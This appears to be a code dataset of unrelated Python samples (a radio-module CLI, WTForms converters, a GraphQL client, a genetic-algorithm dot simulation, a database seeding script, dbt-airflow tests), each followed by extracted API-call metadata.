data.append(("Signal power", f"{module.radio_signal_power} dBm"))
data.append(("Tx power", f"{module.radio_tx_power} dBm"))
data.append(("Tx time", f"{module.radio_tx_time} ms"))
data.append(("Rx time", f"{module.radio_rx_time} ms"))
data.append(("Cell id", f"{module.radio_cell_id}"))
data.append(("Physical cell id", f"{module.radio_pci}"))
data.append(("SNR", f"{module.radio_snr}"))
data.append(("RSRQ", f"{module.radio_rsrq} dBm"))
click.echo(
click.style(
tabulate.tabulate(
data, header, tablefmt="github", numalign="left", stralign="left"
),
fg="red",
)
)
@click.command()
@click.pass_obj
def reboot(app_ctx):
"""
Reboot the module
"""
module: SaraN211Module = app_ctx.module
click.echo(click.style(f"Rebooting module {module}...", fg="red", bold=True))
module.reboot()
click.echo(click.style(f"Module rebooted", fg="red", bold=True))
|
[
"click.argument",
"click.echo",
"click.option",
"click.command",
"tabulate.tabulate",
"click.style"
] |
[((634, 649), 'click.command', 'click.command', ([], {}), '()\n', (647, 649), False, 'import click\n'), ((1189, 1204), 'click.command', 'click.command', ([], {}), '()\n', (1202, 1204), False, 'import click\n'), ((1206, 1226), 'click.argument', 'click.argument', (['"""ip"""'], {}), "('ip')\n", (1220, 1226), False, 'import click\n'), ((1228, 1305), 'click.option', 'click.option', (['"""--runs"""', '"""-r"""'], {'default': '(1)', 'help': '"""How many times should we ping"""'}), "('--runs', '-r', default=1, help='How many times should we ping')\n", (1240, 1305), False, 'import click\n'), ((2211, 2226), 'click.command', 'click.command', ([], {}), '()\n', (2224, 2226), False, 'import click\n'), ((3413, 3428), 'click.command', 'click.command', ([], {}), '()\n', (3426, 3428), False, 'import click\n'), ((1865, 1889), 'click.echo', 'click.echo', (['"""\nResults:"""'], {}), "('\\nResults:')\n", (1875, 1889), False, 'import click\n'), ((145, 209), 'click.style', 'click.style', (['f"""Connecting to network..."""'], {'fg': '"""yellow"""', 'bold': '(True)'}), "(f'Connecting to network...', fg='yellow', bold=True)\n", (156, 209), False, 'import click\n'), ((579, 629), 'click.style', 'click.style', (['f"""Connected!"""'], {'fg': '"""yellow"""', 'bold': '(True)'}), "(f'Connected!', fg='yellow', bold=True)\n", (590, 629), False, 'import click\n'), ((1485, 1527), 'click.style', 'click.style', (['f"""Pinging IP {ip}"""'], {'fg': '"""blue"""'}), "(f'Pinging IP {ip}', fg='blue')\n", (1496, 1527), False, 'import click\n'), ((2412, 2463), 'click.style', 'click.style', (['f"""Collecting statistics..."""'], {'fg': '"""blue"""'}), "(f'Collecting statistics...', fg='blue')\n", (2423, 2463), False, 'import click\n'), ((3563, 3628), 'click.style', 'click.style', (['f"""Rebooting module {module}..."""'], {'fg': '"""red"""', 'bold': '(True)'}), "(f'Rebooting module {module}...', fg='red', bold=True)\n", (3574, 3628), False, 'import click\n'), ((3665, 3717), 'click.style', 'click.style', (['f"""Module rebooted"""'], {'fg': '"""red"""', 'bold': '(True)'}), "(f'Module rebooted', fg='red', bold=True)\n", (3676, 3717), False, 'import click\n'), ((1032, 1120), 'tabulate.tabulate', 'tabulate.tabulate', (['data', 'header'], {'tablefmt': '"""github"""', 'numalign': '"""left"""', 'stralign': '"""left"""'}), "(data, header, tablefmt='github', numalign='left',\n stralign='left')\n", (1049, 1120), False, 'import tabulate\n'), ((1939, 2077), 'tabulate.tabulate', 'tabulate.tabulate', (['results'], {'headers': "['Round trip time (ms)', 'Time to live (ms)']", 'tablefmt': '"""github"""', 'numalign': '"""left"""', 'stralign': '"""left"""'}), "(results, headers=['Round trip time (ms)',\n 'Time to live (ms)'], tablefmt='github', numalign='left', stralign='left')\n", (1956, 2077), False, 'import tabulate\n'), ((3256, 3344), 'tabulate.tabulate', 'tabulate.tabulate', (['data', 'header'], {'tablefmt': '"""github"""', 'numalign': '"""left"""', 'stralign': '"""left"""'}), "(data, header, tablefmt='github', numalign='left',\n stralign='left')\n", (3273, 3344), False, 'import tabulate\n'), ((1690, 1747), 'click.style', 'click.style', (['f"""Success: rtt: {rtt}, ttl: {ttl}"""'], {'fg': '"""red"""'}), "(f'Success: rtt: {rtt}, ttl: {ttl}', fg='red')\n", (1701, 1747), False, 'import click\n'), ((1803, 1859), 'click.style', 'click.style', (['f"""**\t{e.args[0]}\t**"""'], {'fg': '"""red"""', 'bold': '(True)'}), "(f'**\\t{e.args[0]}\\t**', fg='red', bold=True)\n", (1814, 1859), False, 'import click\n')]
|
import wtforms.ext.appengine.ndb as wtfndb
import wtforms
from google.appengine.ext import ndb
from . import fields
### Additional Converters
def add_convertor(property_type, converter_func):
setattr(wtfndb.ModelConverter, 'convert_%s' % property_type, converter_func)
def convert_UserProperty(self, model, prop, kwargs):
"""Returns a form field for a ``ndb.UserProperty``."""
if isinstance(prop, ndb.Property) and (prop._auto_current_user or prop._auto_current_user_add):
return None
kwargs['validators'].append(wtforms.validators.email())
kwargs['validators'].append(wtforms.validators.length(max=500))
return fields.UserField(**kwargs)
def convert_KeyProperty(self, model, prop, kwargs):
"""Returns a form field for a ``ndb.KeyProperty``."""
kwargs['kind'] = prop._kind
kwargs.setdefault('allow_blank', not prop._required)
if not prop._repeated:
return fields.KeyPropertyField(**kwargs)
else:
del kwargs['allow_blank']
return fields.MultipleReferenceField(**kwargs)
def convert_BlobKeyProperty(self, model, prop, kwargs):
"""Returns a form field for a ``ndb.BlobKeyProperty``."""
return fields.BlobKeyField(**kwargs)
def convert_GeoPtProperty(self, model, prop, kwargs):
return fields.GeoPtPropertyField(**kwargs)
def fallback_converter(self, model, prop, kwargs):
pass
setattr(wtfndb.ModelConverter, 'fallback_converter', fallback_converter)
# Monkey-patch wtf's converters
add_convertor('UserProperty', convert_UserProperty)
add_convertor('KeyProperty', convert_KeyProperty)
add_convertor('BlobKeyProperty', convert_BlobKeyProperty)
add_convertor('GeoPtProperty', convert_GeoPtProperty)
|
[
"wtforms.validators.email",
"wtforms.validators.length"
] |
[((542, 568), 'wtforms.validators.email', 'wtforms.validators.email', ([], {}), '()\n', (566, 568), False, 'import wtforms\n'), ((602, 636), 'wtforms.validators.length', 'wtforms.validators.length', ([], {'max': '(500)'}), '(max=500)\n', (627, 636), False, 'import wtforms\n')]
|
import aiohttp
import json
import copy
from typing import Tuple
from aiogqlc.utils import (
is_file_like,
is_file_list_like,
contains_file_variable,
null_file_variables,
)
class GraphQLClient:
def __init__(self, endpoint: str, headers: dict = None) -> None:
self.endpoint = endpoint
self.headers = headers or {}
def prepare_headers(self):
headers = copy.deepcopy(self.headers)
if aiohttp.hdrs.ACCEPT not in headers:
headers[aiohttp.hdrs.ACCEPT] = "application/json"
return headers
@classmethod
def prepare_json_data(
cls, query: str, variables: dict = None, operation: str = None
) -> dict:
data = {"query": query}
if variables:
data["variables"] = null_file_variables(variables)
if operation:
data["operationName"] = operation
return data
@classmethod
def prepare_files(cls, variables: dict) -> Tuple[dict, list]:
file_map = dict()
file_fields = list()
map_index = 0
for key, value in variables.items():
if is_file_like(value):
file_map[str(map_index)] = ["variables.{}".format(key)]
file_fields.append([str(map_index), value])
map_index += 1
elif is_file_list_like(value):
file_list_index = 0
for item in value:
file_map[str(map_index)] = [
"variables.{}.{}".format(key, file_list_index)
]
file_fields.append([str(map_index), item])
file_list_index += 1
map_index += 1
return file_map, file_fields
@classmethod
def prepare_multipart(
cls, query: str, variables: dict, operation: str = None
) -> aiohttp.FormData:
data = aiohttp.FormData()
operations_json = json.dumps(cls.prepare_json_data(query, variables, operation))
file_map, file_fields = cls.prepare_files(variables)
data.add_field("operations", operations_json, content_type="application/json")
data.add_field("map", json.dumps(file_map), content_type="application/json")
data.add_fields(*file_fields)
return data
async def execute(
self, query: str, variables: dict = None, operation: str = None
) -> aiohttp.ClientResponse:
async with aiohttp.ClientSession() as session:
if variables and contains_file_variable(variables):
data = self.prepare_multipart(query, variables, operation)
headers = self.prepare_headers()
else:
data = json.dumps(self.prepare_json_data(query, variables, operation))
headers = self.prepare_headers()
headers[aiohttp.hdrs.CONTENT_TYPE] = "application/json"
async with session.post(
self.endpoint, data=data, headers=headers
) as response:
await response.read()
return response
|
[
"aiogqlc.utils.null_file_variables",
"copy.deepcopy",
"aiohttp.FormData",
"aiogqlc.utils.is_file_list_like",
"aiogqlc.utils.is_file_like",
"json.dumps",
"aiohttp.ClientSession",
"aiogqlc.utils.contains_file_variable"
] |
[((400, 427), 'copy.deepcopy', 'copy.deepcopy', (['self.headers'], {}), '(self.headers)\n', (413, 427), False, 'import copy\n'), ((1884, 1902), 'aiohttp.FormData', 'aiohttp.FormData', ([], {}), '()\n', (1900, 1902), False, 'import aiohttp\n'), ((777, 807), 'aiogqlc.utils.null_file_variables', 'null_file_variables', (['variables'], {}), '(variables)\n', (796, 807), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n'), ((1117, 1136), 'aiogqlc.utils.is_file_like', 'is_file_like', (['value'], {}), '(value)\n', (1129, 1136), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n'), ((2170, 2190), 'json.dumps', 'json.dumps', (['file_map'], {}), '(file_map)\n', (2180, 2190), False, 'import json\n'), ((2431, 2454), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (2452, 2454), False, 'import aiohttp\n'), ((1318, 1342), 'aiogqlc.utils.is_file_list_like', 'is_file_list_like', (['value'], {}), '(value)\n', (1335, 1342), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n'), ((2496, 2529), 'aiogqlc.utils.contains_file_variable', 'contains_file_variable', (['variables'], {}), '(variables)\n', (2518, 2529), False, 'from aiogqlc.utils import is_file_like, is_file_list_like, contains_file_variable, null_file_variables\n')]
|
import json
from .settings import app_settings
_cached_attrs = {}
class Settings:
"""
A proxy to get or set app settings.
"""
def __getattr__(self, attr):
if attr in _cached_attrs:
return _cached_attrs[attr]
return getattr(app_settings, attr, None)
def __setattr__(self, attr, value):
if hasattr(app_settings, attr):
setattr(app_settings, attr, value)
_cached_attrs[attr] = value
def from_dict(self, settings):
"""
Set settings from dictionary object.
"""
for attr, value in settings.items():
setattr(self, attr, value)
def from_json(self, settings):
"""
Set settings from JSON object.
"""
dict_settings = json.loads(settings)
self.from_dict(dict_settings)
def from_json_file(self, path):
"""
Set settings from JSON file.
"""
with open(path) as fp:
dict_settings = json.load(fp)
self.from_dict(dict_settings)
def as_dict(self):
"""
Export all settings as dictionary object.
"""
dict_settings = {}
for key, value in _cached_attrs.items():
dict_settings[key] = value
for key in app_settings.defaults:
dict_settings.update({key: getattr(app_settings, key)})
return dict_settings
settings = Settings()
|
[
"json.load",
"json.loads"
] |
[((774, 794), 'json.loads', 'json.loads', (['settings'], {}), '(settings)\n', (784, 794), False, 'import json\n'), ((990, 1003), 'json.load', 'json.load', (['fp'], {}), '(fp)\n', (999, 1003), False, 'import json\n')]
|
#!/usr/bin/python3
# Auteur : <NAME>
from tkinter import *
import random, math, time, copy
### Variables globales ###
height, width = 300, 100
goal = (width/4, 5*height/6)
start = (3*width/4, height/6)
refreshRate = 1
population = 100
generations = 100
firstGen = True
goalReached = False
won = False
allDead = False
### Classe point ###
class Dot: # Objet point
def __init__(self):
global width, height
self.x = start[0]
self.y = start[1]
self.alive = True
self.score = 0
self.moves = []
self.fittest = False
def __str__(self):
return "x : "+str(self.x)+", y : "+str(self.y)+", alive : "+str(self.alive)+", score : "+str(self.score)+", fittest ="+str(self.fittest)+", move number :"+str(len(self.moves))
def isAlive(self):
if self.x <= 0 or self.x >= width-5 or self.y <= 0 or self.y >= height-5 or (self.x < goal[0]+10 and self.x > goal[0]-10 and self.y < goal[1]+10 and self.y > goal[1]-10):
self.alive = False
def hasWon(self):
if self.x < goal[0]+10 and self.x > goal[0]-10 and self.y < goal[1]+10 and self.y > goal[1]-10 :
return True
return False
def move(self):
self.isAlive()
if (self.alive == True):
newX, newY = self.x, self.y
rand = random.random()
if (rand <= 0.25):
newX += 5
elif (rand <= 0.5):
newX -= 5
elif (rand <= 0.75):
newY += 5
else:
newY -= 5
self.moves.append((newX-self.x, newY-self.y))
self.x, self.y = newX, newY
self.fitness()
def fitness(self):
global goal
if goalReached == True:
if abs(self.x-goal[0]) == 5 and abs(self.y-goal[1]) == 5 :# Cas où le point arrive en diag du but
print("diag")
self.score = len(self.moves)*(self.y-goal[1]) # Mise à zéro de la différence entre le x du point et du goal
else :
self.score = len(self.moves)*math.sqrt((self.x-goal[0])**2+(self.y-goal[1])**2)
else :
self.score = math.sqrt((self.x-goal[0])**2+(self.y-goal[1])**2)
def moveMutated(self, fittest):
self.isAlive()
if (self.alive == True):
newX, newY = self.x, self.y
if (random.random() <= 0.1 or len(self.moves) >= len(fittest.moves)) and self.fittest == False:
rand = random.random()
if (rand <= 0.25):
newX += 5
elif (rand <= 0.5):
newX -= 5
elif (rand <= 0.75):
newY += 5
else:
newY -= 5
else:
newX += fittest.moves[len(self.moves)][0]
newY += fittest.moves[len(self.moves)][1]
self.moves.append((newX-self.x, newY-self.y))
self.x, self.y = newX, newY
self.fitness()
### Classe plateau ###
class Board:
def __init__(self):
global height, width
self.canvas = Canvas(root, width=width, height=height, background='white')
self.dots = []
self.fittest = None
self.job = None
self.createPopulation()
def addDot(self, dot):
self.dots.append(dot)
self.canvas.create_oval(dot.x, dot.y, dot.x+5, dot.y+5, fill='black')
def createPopulation(self):
for i in range(population):
self.dots.append(Dot())
def update(self, firstGen):
global won, allDead
allDead = True
for dot in self.dots:
if firstGen == True:
dot.move()
else:
dot.moveMutated(self.fittest)
if dot.fittest == True:
self.canvas.create_oval(dot.x, dot.y, dot.x+5, dot.y+5, fill='red')
else :
self.canvas.create_oval(dot.x, dot.y, dot.x+5, dot.y+5, fill='black')
if dot.hasWon():
won = True
break
if dot.alive :
allDead = False
def play(self):
global goal, won, firstGen, goalReached
self.canvas.delete("all")
self.canvas.create_oval(goal[0], goal[1], goal[0]+5, goal[1]+5, fill='green')
self.update(firstGen)
if won == False and allDead == False:
self.job = self.canvas.after(refreshRate, self.play)
else :
if allDead == False :
self.killAll()
firstGen = False
goalReached = True
root.after(1000, root.quit)
def cancel(self):
if self.job is not None:
self.canvas.after_cancel(self.job)
self.job = None
def selectFittest(self):
minFitness = sys.maxsize
for dot in self.dots:
if dot.score < minFitness:
self.fittest = dot
minFitness = dot.score
self.fittest.fittest = True
print("Score du fittest :"+str(self.fittest.score), self.fittest.x-goal[0], self.fittest.y-goal[1])
def heritage(self):
self.dots = []
fitDot = copy.deepcopy(self.fittest)
fitDot.alive, fitDot.x, fitDot.y, fitDot.moves, fitDot.win = True, start[0], start[1], [], False
normalDot = copy.deepcopy(fitDot)
normalDot.fittest = False
for i in range(population-1):
self.dots.append(copy.deepcopy(normalDot))
self.dots.append(fitDot)
def killAll(self):
global root
for dot in self.dots :
dot.alive = False
### Main ###
if __name__ == '__main__':
generation = 0
root = Tk()
board = Board()
board.canvas.pack()
root.title("Gen "+str(generation))
board.play()
root.mainloop()
firstGen = False
board.cancel()
board.selectFittest()
generation += 1
while generation <= generations:
won = False
root.title("Gen "+str(generation))
board.heritage()
board.play()
root.mainloop()
board.cancel()
board.selectFittest()
generation += 1
#voir écart entre ancien et nouveau fittest, afficher le nombre de mouvements du fittest dans la fenêtre
#fontion calcul score privilégie trop le peu de mouvements (si le point meurt rapidement = bien)
|
[
"random.random",
"copy.deepcopy",
"math.sqrt"
] |
[((4242, 4269), 'copy.deepcopy', 'copy.deepcopy', (['self.fittest'], {}), '(self.fittest)\n', (4255, 4269), False, 'import random, math, time, copy\n'), ((4386, 4407), 'copy.deepcopy', 'copy.deepcopy', (['fitDot'], {}), '(fitDot)\n', (4399, 4407), False, 'import random, math, time, copy\n'), ((1200, 1215), 'random.random', 'random.random', ([], {}), '()\n', (1213, 1215), False, 'import random, math, time, copy\n'), ((1859, 1919), 'math.sqrt', 'math.sqrt', (['((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)'], {}), '((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)\n', (1868, 1919), False, 'import random, math, time, copy\n'), ((2129, 2144), 'random.random', 'random.random', ([], {}), '()\n', (2142, 2144), False, 'import random, math, time, copy\n'), ((4488, 4512), 'copy.deepcopy', 'copy.deepcopy', (['normalDot'], {}), '(normalDot)\n', (4501, 4512), False, 'import random, math, time, copy\n'), ((1783, 1843), 'math.sqrt', 'math.sqrt', (['((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)'], {}), '((self.x - goal[0]) ** 2 + (self.y - goal[1]) ** 2)\n', (1792, 1843), False, 'import random, math, time, copy\n'), ((2026, 2041), 'random.random', 'random.random', ([], {}), '()\n', (2039, 2041), False, 'import random, math, time, copy\n')]
|
import numpy as np
from skmultiflow.trees.nodes import ActiveLearningNodePerceptron
from skmultiflow.trees.attribute_observer import NominalAttributeRegressionObserver
from skmultiflow.trees.attribute_observer import NumericAttributeRegressionObserver
from skmultiflow.utils import get_dimensions
class RandomLearningNodePerceptron(ActiveLearningNodePerceptron):
""" Learning Node for regression tasks that always use a linear perceptron
model to provide responses.
Parameters
----------
initial_class_observations: dict
In regression tasks this dictionary carries the sufficient statistics
to perform online variance calculation. They refer to the number of
observations (key '0'), the sum of the target values (key '1'), and
the sum of the squared target values (key '2').
max_features: int
Number of attributes per subset for each node split.
parent_node: RandomLearningNodePerceptron (default=None)
A node containing statistics about observed data.
random_state: int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, initial_class_observations, max_features, parent_node=None,
random_state=None):
super().__init__(initial_class_observations, parent_node, random_state)
self.max_features = max_features
self.list_attributes = np.array([])
def learn_from_instance(self, X, y, weight, rht):
"""Update the node with the provided instance.
Parameters
----------
X: numpy.ndarray of length equal to the number of features.
Instance attributes for updating the node.
y: float
Instance target value.
weight: float
Instance weight.
rht: HoeffdingTreeRegressor
Regression Hoeffding Tree to update.
"""
# In regression, the self._observed_class_distribution dictionary keeps three statistics:
# [0] sum of sample seen by the node
# [1] sum of target values
# [2] sum of squared target values
# These statistics are useful to calculate the mean and to calculate the variance reduction
if self.perceptron_weight is None:
self.perceptron_weight = self.random_state.uniform(-1, 1, len(X)+1)
try:
self._observed_class_distribution[0] += weight
self._observed_class_distribution[1] += y * weight
self._observed_class_distribution[2] += y * y * weight
except KeyError:
self._observed_class_distribution[0] = weight
self._observed_class_distribution[1] = y * weight
self._observed_class_distribution[2] = y * y * weight
# Update perceptron
self.samples_seen = self._observed_class_distribution[0]
if rht.learning_ratio_const:
learning_ratio = rht.learning_ratio_perceptron
else:
learning_ratio = rht.learning_ratio_perceptron / \
(1 + self.samples_seen * rht.learning_ratio_decay)
# Loop for compatibility with bagging methods
for i in range(int(weight)):
self.update_weights(X, y, learning_ratio, rht)
if self.list_attributes.size == 0:
self.list_attributes = self._sample_features(get_dimensions(X)[1])
for i in self.list_attributes:
try:
obs = self._attribute_observers[i]
except KeyError:
if rht.nominal_attributes is not None and i in rht.nominal_attributes:
obs = NominalAttributeRegressionObserver()
else:
obs = NumericAttributeRegressionObserver()
self._attribute_observers[i] = obs
obs.observe_attribute_class(X[i], y, weight)
def _sample_features(self, n_features):
return self.random_state.choice(
n_features, size=self.max_features, replace=False
)
|
[
"skmultiflow.trees.attribute_observer.NominalAttributeRegressionObserver",
"skmultiflow.trees.attribute_observer.NumericAttributeRegressionObserver",
"skmultiflow.utils.get_dimensions",
"numpy.array"
] |
[((1649, 1661), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (1657, 1661), True, 'import numpy as np\n'), ((3595, 3612), 'skmultiflow.utils.get_dimensions', 'get_dimensions', (['X'], {}), '(X)\n', (3609, 3612), False, 'from skmultiflow.utils import get_dimensions\n'), ((3867, 3903), 'skmultiflow.trees.attribute_observer.NominalAttributeRegressionObserver', 'NominalAttributeRegressionObserver', ([], {}), '()\n', (3901, 3903), False, 'from skmultiflow.trees.attribute_observer import NominalAttributeRegressionObserver\n'), ((3952, 3988), 'skmultiflow.trees.attribute_observer.NumericAttributeRegressionObserver', 'NumericAttributeRegressionObserver', ([], {}), '()\n', (3986, 3988), False, 'from skmultiflow.trees.attribute_observer import NumericAttributeRegressionObserver\n')]
|
'''
Populates the SQLite database with
a user and a sequence with three components.
'''
import json
from pyelixys.web.database.model import session
from pyelixys.web.database.model import Roles
from pyelixys.web.database.model import User
from pyelixys.web.database.model import Sequence
from pyelixys.web.database.model import Component
from pyelixys.web.database.model import Reagents
from pyelixys.web.database.model import metadata
# Import hashing library for pw hash
import hashlib
def create_role():
# Create admin role
role = Roles('Administrator', 255)
session.add(role)
session.commit()
return role
def get_default_user_client_state():
""" Silly work around for current webserver """
#TODO Remove client default state server dependency
return ({"sequenceid": 0,
"runhistorysort": {"column": "date&time", "type": "sort", "mode": "down"},
"lastselectscreen": "SAVED",
"selectsequencesort": {"column": "name", "type": "sort", "mode": "down"},
"prompt": {
"show": False, "screen": "", "text2": "", "text1": "",
"edit2default": "", "buttons": [], "title": "",
"edit1validation": "", "edit1": False, "edit2": False,
"edit1default": "", "edit2validation": "",
"type": "promptstate"},
"screen": "HOME",
"type": "clientstate",
"componentid": 0})
def get_default_component_state(cassette, reactor_count):
''' Silly work around for the current webserver '''
#TODO Remove Component state/details dependency
# Create a dictionary and append to it the
# details needed
details_dict = {}
details_dict['note'] = cassette.Note
details_dict['sequenceid'] = cassette.SequenceID
details_dict['reactor'] = reactor_count
details_dict['validationerror'] = False
details_dict['componenttype'] = cassette.Type
details_dict['type'] = 'component'
details_dict['id'] = cassette.ComponentID
# For all the cassette's reagents, append their ids
details_dict['reagent'] = []
for reagent in cassette.reagents:
details_dict['reagent'].append(reagent.ReagentID)
return details_dict
def create_user(role_id):
# Let's create a default user
# Encrypt the password using md5 and reutrn as hex
new_user = User()
new_user.Username = 'devel'
new_user.Password = hashlib.md5('devel').hexdigest()
new_user.FirstName = 'Sofiebio'
new_user.LastName = 'Developer'
new_user.Email = '<EMAIL>'
new_user.RoleID = role_id
new_user.ClientState = json.dumps(
get_default_user_client_state())
session.add(new_user)
session.commit()
return new_user
def create_sequence(user_id):
# Create a new sequence for the user
new_seq = Sequence()
new_seq.Name = 'Sequence 1'
new_seq.Component = 'Test Sequence'
new_seq.Type = 'Saved'
new_seq.UserID = user_id
session.add(new_seq)
session.commit()
return new_seq
def create_cassette_components(sequence_id):
# Create a new set of component cassettes
cass_list = []
for cass_count in range(1,4):
new_comp = Component()
new_comp.SequenceID = sequence_id
new_comp.Type = 'CASSETTE'
new_comp.Note = ''
# Leave details empty, update later
new_comp.Details = ''
session.add(new_comp)
session.commit()
cass_list.append(new_comp)
return cass_list
def create_reagents(sequence_id, cassettes):
# Let's create some empty reagents
# For each of the 3 cassettes, create
# 12 reagents
for cassette in cassettes:
for reg_count in range(1,13):
reagent = Reagents()
reagent.SequenceID = sequence_id
reagent.Position = reg_count
reagent.component = cassette
reagent.ComponentID = cassette.ComponentID
session.add(reagent)
session.commit()
def update_sequence_details(sequence):
# Update the first component id and
# component count of the sequence's fields
# Query for the first component matched
component_id = session.query(Component).filter_by(
SequenceID = sequence.SequenceID).first().ComponentID
sequence.FirstComponentID = component_id
sequence.ComponentCount = 3
sequence.Valid = 1
session.commit()
def update_component_details(cassettes):
# Update the details field of each new
# cassette component
# Keep a reactor count
reactor_count = 1
for cassette in cassettes:
cassette.Details = json.dumps(
get_default_component_state(
cassette,
reactor_count))
session.commit()
reactor_count += 1
if __name__ == '__main__':
'''
Running this file as a script
shall execute the following which
will create a new role and user.
The script shall also create a
default sequence with three cassettes
that contain no reagents.
'''
metadata.create_all(checkfirst=True)
role = create_role()
user = create_user(role.RoleID)
sequence = create_sequence(user.UserID)
cassettes = create_cassette_components(sequence.SequenceID)
create_reagents(sequence.SequenceID, cassettes)
update_sequence_details(sequence)
update_component_details(cassettes)
from IPython import embed
embed()
|
[
"pyelixys.web.database.model.Roles",
"pyelixys.web.database.model.Reagents",
"hashlib.md5",
"pyelixys.web.database.model.Sequence",
"pyelixys.web.database.model.User",
"pyelixys.web.database.model.session.add",
"IPython.embed",
"pyelixys.web.database.model.Component",
"pyelixys.web.database.model.metadata.create_all",
"pyelixys.web.database.model.session.query",
"pyelixys.web.database.model.session.commit"
] |
[((545, 572), 'pyelixys.web.database.model.Roles', 'Roles', (['"""Administrator"""', '(255)'], {}), "('Administrator', 255)\n", (550, 572), False, 'from pyelixys.web.database.model import Roles\n'), ((577, 594), 'pyelixys.web.database.model.session.add', 'session.add', (['role'], {}), '(role)\n', (588, 594), False, 'from pyelixys.web.database.model import session\n'), ((599, 615), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (613, 615), False, 'from pyelixys.web.database.model import session\n'), ((2361, 2367), 'pyelixys.web.database.model.User', 'User', ([], {}), '()\n', (2365, 2367), False, 'from pyelixys.web.database.model import User\n'), ((2678, 2699), 'pyelixys.web.database.model.session.add', 'session.add', (['new_user'], {}), '(new_user)\n', (2689, 2699), False, 'from pyelixys.web.database.model import session\n'), ((2704, 2720), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (2718, 2720), False, 'from pyelixys.web.database.model import session\n'), ((2828, 2838), 'pyelixys.web.database.model.Sequence', 'Sequence', ([], {}), '()\n', (2836, 2838), False, 'from pyelixys.web.database.model import Sequence\n'), ((2971, 2991), 'pyelixys.web.database.model.session.add', 'session.add', (['new_seq'], {}), '(new_seq)\n', (2982, 2991), False, 'from pyelixys.web.database.model import session\n'), ((2996, 3012), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (3010, 3012), False, 'from pyelixys.web.database.model import session\n'), ((4384, 4400), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (4398, 4400), False, 'from pyelixys.web.database.model import session\n'), ((5049, 5085), 'pyelixys.web.database.model.metadata.create_all', 'metadata.create_all', ([], {'checkfirst': '(True)'}), '(checkfirst=True)\n', (5068, 5085), False, 'from pyelixys.web.database.model import metadata\n'), ((5419, 5426), 'IPython.embed', 'embed', ([], {}), '()\n', (5424, 5426), False, 'from IPython import embed\n'), ((3196, 3207), 'pyelixys.web.database.model.Component', 'Component', ([], {}), '()\n', (3205, 3207), False, 'from pyelixys.web.database.model import Component\n'), ((3394, 3415), 'pyelixys.web.database.model.session.add', 'session.add', (['new_comp'], {}), '(new_comp)\n', (3405, 3415), False, 'from pyelixys.web.database.model import session\n'), ((3424, 3440), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (3438, 3440), False, 'from pyelixys.web.database.model import session\n'), ((4741, 4757), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (4755, 4757), False, 'from pyelixys.web.database.model import session\n'), ((2424, 2444), 'hashlib.md5', 'hashlib.md5', (['"""devel"""'], {}), "('devel')\n", (2435, 2444), False, 'import hashlib\n'), ((3733, 3743), 'pyelixys.web.database.model.Reagents', 'Reagents', ([], {}), '()\n', (3741, 3743), False, 'from pyelixys.web.database.model import Reagents\n'), ((3938, 3958), 'pyelixys.web.database.model.session.add', 'session.add', (['reagent'], {}), '(reagent)\n', (3949, 3958), False, 'from pyelixys.web.database.model import session\n'), ((3971, 3987), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (3985, 3987), False, 'from pyelixys.web.database.model import session\n'), ((4178, 4202), 'pyelixys.web.database.model.session.query', 'session.query', (['Component'], {}), '(Component)\n', (4191, 4202), False, 'from pyelixys.web.database.model import session\n')]
|
from os import path
from dbt_airflow_factory.airflow_dag_factory import AirflowDagFactory
from dbt_airflow_factory.operator import EphemeralOperator
from tests.utils import task_group_prefix_builder, test_dag
def _get_ephemeral_name(model_name: str) -> str:
return f"{model_name}__ephemeral"
def test_ephemeral_dag_factory():
# given
factory = AirflowDagFactory(
path.dirname(path.abspath(__file__)), "ephemeral_operator"
)
# when
dag = factory.create()
# then
assert len(dag.tasks) == 15
task_group_names = [
el
for node_name in ["model1", "model4", "model6"]
for el in [
task_group_prefix_builder(node_name, "test"),
task_group_prefix_builder(node_name, "run"),
]
]
ephemeral_task_names = [
node_name + "__ephemeral"
for node_name in [
"model2",
"model3",
"model5",
"model7",
"model8",
"model9",
"model10",
]
]
assert set(dag.task_ids) == set(
["dbt_seed", "end"] + task_group_names + ephemeral_task_names
)
for ephemeral_task_name in ephemeral_task_names:
assert isinstance(dag.task_dict[ephemeral_task_name], EphemeralOperator)
def test_ephemeral_tasks():
with test_dag():
factory = AirflowDagFactory(
path.dirname(path.abspath(__file__)), "ephemeral_operator"
)
tasks = factory._builder.parse_manifest_into_tasks(
factory._manifest_file_path(factory.read_config())
)
# then
assert (
task_group_prefix_builder("model1", "test")
in tasks.get_task("model.dbt_test.model1").run_airflow_task.downstream_task_ids
)
assert (
task_group_prefix_builder("model1", "run")
in tasks.get_task("model.dbt_test.model1").test_airflow_task.upstream_task_ids
)
assert (
task_group_prefix_builder("model1", "test")
in tasks.get_task("model.dbt_test.model2").run_airflow_task.upstream_task_ids
)
assert (
"model2__ephemeral"
in tasks.get_task("model.dbt_test.model1").test_airflow_task.downstream_task_ids
)
assert (
"model2__ephemeral"
in tasks.get_task("model.dbt_test.model3").run_airflow_task.upstream_task_ids
)
assert (
"model3__ephemeral"
in tasks.get_task("model.dbt_test.model5").run_airflow_task.downstream_task_ids
)
assert (
"model3__ephemeral"
in tasks.get_task("model.dbt_test.model10").run_airflow_task.upstream_task_ids
)
assert (
"model9__ephemeral"
in tasks.get_task("model.dbt_test.model10").run_airflow_task.upstream_task_ids
)
assert (
"model10__ephemeral"
in tasks.get_task("model.dbt_test.model3").run_airflow_task.downstream_task_ids
)
assert (
"model10__ephemeral"
